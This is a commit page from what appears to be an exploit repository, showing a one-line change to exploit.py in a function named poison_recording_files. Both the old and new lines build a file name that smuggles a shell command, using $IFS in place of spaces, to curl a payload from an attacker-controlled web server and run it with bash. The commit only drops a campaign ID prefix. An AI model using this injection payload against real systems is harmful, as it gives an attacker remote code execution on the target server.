Remove campaign ID from the payload

Chocapikk · Sep 15, 2024 · 83c9bd5 · 83c9bd5
1 parent 1e5c4a5
commit 83c9bd5
Showing 1 changed file with 1 addition and 1 deletion.
diff --git a/exploit.py b/exploit.py
@@ -562,7 +562,7 @@ def poison_recording_files(self, session, username, password):
             self.custom_print(f"Authenticated as agent using phone credentials", "+")
 
             try:
-                malicious_filename = f"{self.CAMPAIGN_ID}1337$(curl$IFS@{self.PAYLOAD_WEBSERVER_HOST}:{self.PAYLOAD_WEBSERVER_PORT}$IFS-o$IFS{self.MALICIOUS_FILENAME}&&bash$IFS{self.MALICIOUS_FILENAME})"
+                malicious_filename = f"$(curl$IFS@{self.PAYLOAD_WEBSERVER_HOST}:{self.PAYLOAD_WEBSERVER_PORT}$IFS-o$IFS{self.MALICIOUS_FILENAME}&&bash$IFS{self.MALICIOUS_FILENAME})"
                 session_name = re.findall(
                     r"var session_name = '([a-zA-Z0-9_]+?)';", response.text
                 )[0]